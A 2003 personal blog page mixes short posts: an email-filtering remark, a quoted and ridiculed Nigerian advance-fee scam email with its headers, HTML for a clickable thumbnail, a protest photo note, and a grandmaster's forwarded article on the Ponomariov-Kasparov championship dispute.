Thanks to Politech, we discover that Parliment doesn't approve of email containing "nasty" words or ideas. Of course, they haven't told the members who's to decide or what the banned word list might be:
story is here. Probably means it's needed to combat the terrorists...
posted by Gary Williams at 12:37 PM
| link |
Something like Nigerians named Williams?
Well, it finally happened. Instead of just reading about the Nigerian email scam on the intrusions@incidents.org web admin mailing list I subscribe to, I open up a blog and sure enough, the scammers find me:
FROM: PRINCE DORMAN
REQUEST FOR AN ASSISTANCE
Dear Sir,
It is my pleasure to write you after much consideration
since telephone communication can not be suitable enough
to
communicate to you at first.
Being the only son of my father, late Chief Alfred
Williams
from KWANATAL ZULU in Republic of South Africa (SA) I am
22
years of age. My father was limited liability Cocoa and
Gold merchant in JOHANNESBURG South Africa before his
untimely death. After his business trip to Abidjan -Côte
d'Ivoire, to negotiate on a cocoa and gold business he
wanted to invest in Abidjan - Côte d'Ivoire. A Week after
he came back from Abidjan, he was attacked with my mother
by unknown assassins, which my mother died instantly but
my
father died after five days in a private hospital on that
faithful afternoon. I didn't know that my father was going
to leave me after I had lost my mother. But before he gave
up the ghost, it was as if he knew he was going to die. He
my father, MAY HIS SOUL REST IN PERFECT PEACE he disclosed
to me that he deposited the sum of $15,800,000,00 US
Dollars (FIFTEEN MILLION EIGHT HUNDRED THOUSAND DOLLARS)
in
a bank here in Abidjan- Côte d'ivoire.That the money was
meant for his cocoa and Gold company he wanted to
establish
in Abidjan - Côte d'Ivoire though, according to my father
he deposited the money in a confident account of the bank
and he handed to me all the relievant documents of the
deposited fund and instructed me to seek for a reliable
and
trust worthy business partner for my life time investment
abroad. Now I have succeeded in locating the bank here in
Abidjan - Côte d'Ivoire. Now I am soliciting for your
assistance to help me to transfer this money out from
Abidjan to your safe account abroad so that we will invest
it in any meaningful lucrative business in your country
because this is my only hope in life.
Awaiting anxiously to hear from you so that we can
discuss the modalities of this transaction.
Please kindly contact me through email immediately for
more discussion.
Thanks for your kind attention.
Yours sincerely,
Mr. Prince Dorman
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35? Hors coût du SMS)
The first thing I noticed was that (in the regular Outlook Express display) the to: address was kidofkindom@caramail.com. So I popped up the full header details:
Return-Path: <kidofkingdom@caramail.com>
Received: from mail1.caramail.com (mail1.caramail.com [213.193.13.92])
by ns1.corninglink.com (8.11.6/8.10.1) with ESMTP id h0K9oRh13997
for <gwms@corninglink.com>; Mon, 20 Jan 2003 04:50:28 -0500 (EST)
Received: from caramail.com (www37.caramail.com [213.193.13.47])
by mail1.caramail.com (Postfix) with SMTP
id 39EB8D56B; Mon, 20 Jan 2003 10:41:09 +0100 (MET)
From: Dorman Prince <kidofkingdom@caramail.com>
To: kidofkingdom@caramail.com
Message-ID: <1043055668017058@caramail.com>
X-Mailer: Caramail - www.caramail.com
X-Originating-IP: [194.9.184.101]
Mime-Version: 1.0
Subject: HELP/PARTNERSHIP
Date: Mon, 20 Jan 2003 10:41:08 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0170581043055668_ID"
X-UIDL: (_A"!2oY"!h;L!!Wo##!
Now while I like the idea of investing (FIFTEEN MILLION EIGHT HUNDRED THOUSAND DOLLARS)
for an unknown friend from South Africa, so he's not troubled by all the problems involved with moving your money to another country, somehow I'm not reassured by someone who emails me by sending mail to himself, so I think I'll have to pass up this rare opportunity. Duh...
Click the Thumbnail: If you want your visitors to see your larger images use a clickable thumbnail.
The tutorial at Mandarin Design's Grouping Images will help you with clickable thumbnails. I've always wondered whether this image of a jet "breaking the sound barrier" was an actual atmospheric effect or a photoshop bunny.
Here's the code:
<!-- embedding pix in box with link to larger pix -->
<div style="width:350px;text-align:left;
padding:5px;background-color:white;
border:5px solid black;font-size:12px;padding:10px;">
<A HREF="#"
onClick="docWindow=window.open('http://216.136.200.194/auction/Jan/20031192765544196038192.jpg',
'myWindow1',
'toolbar=no,width=400,
height=147, left=10,
top=10 directories=no,status=yes,scrollbars=no,resizable=no,menubar=no');
docWindow.focus();return false">
<img src="http://216.136.200.194/auction/Jan/20031194294662493089807.jpg" width="60" height="43"
align="left" hspace="10" alt="Click this thumbnail to see the full size image." >
</a>
<b style="position: relative;top: -1px;font: normal normal normal 12pt Haettenschweiler;color: #FF3300;margin-left: 1px;">Click the Thumbnail: </b>
If you want your visitors to see your larger images use a clickable thumbnail.
The tutorial at Mandarin Design's
<a href="http://www.mandarindesign.com/grouping.html">Grouping Images</a>
will help you with clickable thumbnails. I've always wondered whether this image of a jet
"breaking the sound barrier" was an actual atmospheric effect or a photoshop bunny.
</div>
posted by Gary Williams at 12:37 AM
| link |
Sunday, January 19, 2003
Nude peace demo in Santa Cruz
Update:
This is the picture that replaced that photomontage that drew complaints (from a woman who is flashing a V-sign at the camera). The discussion on the site's mailing list suggests that it would be a mistake to let people make after-the-fact complaints as long as the normal constraints of press photographer behavior are complied with (it's a public event, the photographer make it obvious what's going on, and so on...). Whatever the eventual policy decision, the current situation is that the complaint got the photomontage removed, and replaced with what you see here (without the fancy type overlay I got from Mandarin Design, of course).
posted by Gary Williams at 4:52 PM
| link |
Although I am an avid chess player (and former member of the Internet Chess Club -- I will be a member again, as soon as I start earning enough to pay for membership again), I was suprised to be included in a distinguished list of masters and chess magazine editors this morning. I did do a little work for the NIA chess group in France, designs for their web site which, as it turned out, were not needed as they found a much more capable designer in Paris. In any case, Mikhail Golubev included me in an email discussing a crisis facing the world chess championship.
You hardly will be surprised to hear from me that situation around
Ponomariov-Kasparov (or even Kasparov-Ponomariov if you personally
strongly prefer) match is disastrous, and according to all reports it
can become much worse at absolutely any moment.
That's what we have now and that's why I wrote an article called 'Is
there any way of saving the Reunification Championship?', you can find
English translation at
http://chess-sector.odessa.ua/unity_e.htm You also can find an pure text below, on the bottom of this message.
I tried, absolutely, to do my best, analyse situation and propose
possible ways to solve it.
Article was first published on 16th January in Russian language and was
republished in full form on 16th-17th January by at least one Ukrainian
and two Russian leading chess websites (www.chesspage.kiev.ua,
www.bs-chess.com, www.chess-express.ru).
Everything that can be of importance regarding that article, I tried to
express in article.
So, I will add below just few words for you, about myself and about my
intentions.
I am Ukrainian grandmaster, and editor of chess website
chess-sector.odessa.ua which is my personal project. I am not an
employer of Ukrainian Chess Federation and I represent only myself now.
I have quite a large experience of co-operation with Ruslan Ponomariov,
current FIDE World Champion. I accompanied him as a trainer at Bavarian
Open 1999, and Russia vs the World Moscow 2001 Match. Also, starting
from August 1998, I regularly update 'Ruslan Ponomariov's Page' in www.
In the beginning it was absolutely amateur web attempt, devoted to a
very young and very talented Ukrainian player. I tried to support
Ponomariov in 1998 and so of course I try to do now. Therefore, despite
I am not Ruslan Ponomariov's representative and never had (or aimed to
have) rights to represent him in any official negotiations with FIDE, it
would be simply untrue to say that I 'stay' or is able to 'stay' at some
intermediate position between Ponomariov and FIDE in the current situation.
The problem is that between World Champion Ponomariov and FIDE is a
permanently increasing gap, and there nobody now can stay. Consequences
of such situation are really unpredictable.
If we really need to have a single, recognised by absolutely everyone
world champion in chess, we all should create a BRIDGE between the FIDE
World Champion and FIDE, and save unification process that was initiated
by GM Yasser Seirawan, whom I highly respect.
I like to support interests of Ruslan Ponomariov, my friend, compatriot
and colleague, and I like Yasser Seirawan's Fresh Start initial ideas.
That's my real position, and now you probably will believe me if I will
say that I didn't consulted with Ruslan Ponomariov, who is concentrated
on extremely tense Wijk aan Zee tournament, when I took my recent
publishing actions, that will be, I hope, not as much intensive starting
from now.
If you will have impression that I just have at some point decided that
I am someone like Yasser Seirawan or Aleksandr Solzhenitsyn, it would
mean that I made something wrong. My intention is to propose specified
ideas that will help to solve specified, still local, problem - and of
course, I can't be absolutely sure that I managed to do even that,
despite my permanent consultations with chess colleagues from different
countries.
Translation of my article was edited by Graham Brown
(www.easytorecall.com), who is British chess-player and chess webmaster
(Graham Brown is also one of co-authors of the Chess on the Web book).
Unfortunately, I can't say the same about email message text above, so
if you will like to use it or part of it in your correspondence or
publications, please, take a full liberty to edit possible language errors.
Please, read my article at
http://chess-sector.odessa.ua/unity_e.htm provide link or publish it, if you have such possibility, and express
your opinions publicly. That is what I really ask you to do in case if
you share even part of my views.
Is there any way of saving the Reunification Championship?
by Mikhail Golubev
16 January 2003
The text below is part of a review of rounds 1-4 of the Corus
Tournament, prepared on the 16th January 2003. It relates to latest
developments regarding the World Championship To a large extent it
represents more than just my own personal thoughts, is the outcome of my
extensive correspondence with colleagues - grandmasters and chess
journalists from many different countries who are also concerned with
the situation.
I am publishing this extract as independent material. I have nothing
against its reproduction or distribution (without changes, with or
without identification of a source, but with an indication of author and
date). Please, however, get an agreement with me on any changes and
abridgement via e-mail, my address is as follows: gmi@europe.com.
(M.G., 16.1.2003)
It is very strange that the gist and hidden motive of the conflict
between Ruslan Ponomariov and FIDE, which seems obvious, is still
obscured by an argument about time control and FIDE World Champion
Ruslan Ponomariov's privilege (or lack of privilege) to retain the title
in the event of a draw. I don't know whether FIDE had hopes of
"managing" the opinion of its champion with the assistance of third
parties - or if FIDE just did not succeed in showing sufficient respect
for the 18-year old World Champion. (Everything in history happens once
for the first time, and we then learn by trial and error... Never has
the World Champion been so young!), but all the signs are that from the
very beginning (since Spring 2002) Ruslan Ponomariov has, in practice,
been kept away from negotiations on reunification. The second mistake
made by FIDE, i.e. the participation of the world chess organization in
preparation for the upcoming Kasparov vs Computer match, was fatal and
almost deprived the chess world of a chance for an agreement, which has
been so agonizing to reach.
The balance of the strongest players' interests was completely destroyed.
As far back as 2001 the FIDE President (at least, in his speech
broadcast worldwide by the mass media) had promised the further, 16th
FIDE World Champion (later it was Ponomariov who won this title) a match
against the strongest computer programme. The unification had the
purpose consolidating the two world champions and the player with the
highest rating into one unification world championship cycle. How was it
possible not to take into account the interests of all these chess
players equally?
At the end of September Ponomariov lost his chief coach, whose health
could not withstand the stress, restriction of his pupil's rights,
pressure on him personally and the reticence and long wait for FIDE
Congress.
...Of course, Garry Kasparov, the most famous chess player in the world,
has every right to the highest fee in any unofficial match. But from an
ethical point of view FIDE should not have taken part in it! It is also
astonishing that FIDE supported Kasparov's match as the FIDE President
being the compatriot of one of the opponents should have avoided any
hint of double standards regarding the participants.
It is possible to understand and excuse a lot, including the state of
euphoria, which possibly engulfed FIDE after they had managed to come to
a peaceful agreement with Garry Kasparov, their, till then, long
standing opponent. And that for some time this euphoria made FIDE forget
about their own champion.
But should Ponomariov agree to further restriction of his interests if
the international federation fails to restore the status quo with
respect to its attitude to the leading chess players? Certainly, it's up
to the FIDE World Champion to decide. In any case, it is impossible not
to conclude that the development of the situation; persistence of the
international federation representatives and Ruslan Ponomariov's strong
resistance, leave no chance to hope that the contract signed by
Ponomariov (under incredible pressure) based on principles suggested by
the international federation so far, will have anything to do with the
spirit of the chess world unification. Other options (such as
proclamation of Kasparov as a World Champion without any match or
announcement of Kasparov's match against another opponent) are similarly
disastrous.
Is there any chance of saving the reunification championship in spite of
it all?
Since the FIDE Congress (that took place in Autumn 2002 in Bled) Ruslan
Ponomariov has been insisting on the privilege to retain the title in
the event of a draw in his match against Kasparov (It would not be a
contradiction to chess traditions and it would give Ponomariov the same
privilege that Classical World Champion, Kramnik, will have in the
parallel match against Leko). In his second demand Ponomariov stated
that his match with Kasparov should be played with the new FIDE time
control, used in 2001/2002 FIDE World Championship, which brought
Ponomariov the title of the World Champion. This requirement is more
than in line with chess traditions and common sense, but it contradicts
FIDE strategic idea of coming back to the classical time control.
FIDE does not accept the demands of the World Champion, at least not all
of them, and the situation has been giving the impression of an absolute
deadlock for a long time.
At the same time there must have been a normal solution, and probably
even more than only one such solution. The solution, which will take
into consideration the reality of the current situation, without any mad
approaches such as Ponomariov's disqualification or revision of the
schedule for the Kasparov vs Computer match that is currently being
fulfilled in New York.
If FIDE does not intend to just support Garry Kasparov in obtaining the
Champion title in the quickest possible time (because if it does, what
is currently the matter of worrying in the international chess
community, the situation is really hopeless and there is no normal way
out), but, instead, has a purpose of a Reunification World Championship
with the classical time control, then, for instance, there should have
been no obstacles for Ruslan Ponomariov to retain the title of the World
Champion regardless of the outcome of the semi-final unification match
(this match should not have the status of FIDE World Championship) until
the final unification match has been played.
If, for example, Ponomariov is defeated by Kasparov, then Ponomariov
will lose his title only after the final unification process and return
to the classical control is completed, i.e. after the final
reunification match ends - when the new FIDE World Champion will be
announced.
If it is impossible to arrange the already promised chess world
reunification final match with the classical time control (i.e. a match
between winners of the Ponomariov-Kasparov and Kramnik-Leko matches),
FIDE should, in such a case, return to Championships with the FIDE time
control (yes, now this is the right time for FIDE to take responsibility
for the things that will happen after the Ponomariov-Kasparov match,
including taking into consideration the possibility that the winner of
the Kramnik-Leko match can refuse for any reason to play in the
reunification final match). ...In this case Ruslan Ponomariov will not
lose his title (with all the consequent rights and privileges) even for
a single moment regardless of the result of his match against Garry
Kasparov with classical time control. It is reasonable because
Ponomariov won his Champion title with the FIDE time control and nothing
should make him lose this title unless the transfer to classical time
control is fully completed.
An opinion exists that a Ponomariov-Kasparov match without World
Championship status has no sense. But quite the opposite is the truth -
a Ponomariov-Kasparov match has no sense if it is arranged in another
way than, first of all, as a semi-final unification match, because the
unprecedented decision to grant the player with the highest rating the
right to play against the World Champion can be approved only if all
existing championships are unified.
Without any doubt, the interest of the sponsors require special care in
selecting a proper title for the official match in case it is not a FIDE
World Championship (which, in my view, is the right decision). It is
necessary to concentrate on the words "unification" and "classical"
(implying time control) but not on the word "semi-final". If it is
impossible to meet sponsor interest even under such a condition, the
winner of a Kasparov-Ponomariov match can be awarded a special
"intermediary" title, for instance, FIDE Classical Chess World Champion,
the title that will be absolutely independent (!) of the current title
of Ruslan Ponomariov. Both Garry Kasparov and Ruslan Ponomariov can win
this intermediary title (so, Ruslan Ponomariov will be able to obtain
both titles of World Champion at the same time).
It should be absolutely strictly stipulated that the present
intermediary title (FIDE Classical Chess World Champion) will not be
given any advancement within FIDE in case the final reunification match
against the Kramnik-Leko match winner has not taken place (for any
reason) within the predetermined period of time. In this case FIDE has
to come back to a FIDE World Championships with a FIDE time control (and
the intermediary title should possibly be automatically abolished after
the first championship of that kind).
If the final reunification championship with the winner of the
Kramnik-Leko match has taken place, the intermediary title (FIDE
Classical Chess World Champion) should also be automatically abolished
(and in this case this is absolutely critical) immediately after the
final reunification match has been played and the winner (Ponomariov,
Kramnik, Kasparov or Leko) has obtained the most honourable title of
FIDE World Champion, which currently belongs (and will belong until the
end of the final reunification match in accordance with all I suggest
above) to Ukrainian grandmaster Ruslan Ponomariov.
This is my suggestion that I have not discussed so far with any of the
supposed participants of the reunification championship or their
official representatives. This suggestion might seem artificial, but ...
artificial is the whole process of unification (and especially, the
currently critical match between Ponomariov and Kasparov).
Unfortunately, from many points of view, it is always more "natural" to
destroy than to build.
It is my view that, after the conflict has recently reached the public
stage, now is the time for independent chess experts, those who are not
indifferent to the future of the World Championship, to express their
opinions. Someone can possibly offer a better scheme, I will be happy if
such an attempt leads to success. In any case the balance of interests
has to be met. To enter a reunification championship cycle with the
status of the current champion diminished would lay a foundation for new
disunity in the chess world for many years ahead.
While I'm certainly not competent to speak knowledgeably to the issues Mikhail raises, I'm certainly flattered to be informed of the issue. Frankly, it reminds me a bit of the kind of foolishness that big companies engage in during standards committee meetings. (I had a little experience watching from the sidelines when I worked for a compiler company, watching IBM, DEC and other monsters fight over seemingly trivial issues in language definitions, which I guess mattered somehow in the marketplace.) Seems shocking, though, that an organization like FIDE would get the world championship of chess messed up, although when you think of it, they are based in Paris, aren't they? It does seem fitting that the argument would revolve around time rules, though, since clock pressure makes a huge difference in grandmaster chess.
Anybody got any illuminating comments? Send 'em to me and I'll forward them to Mikhail.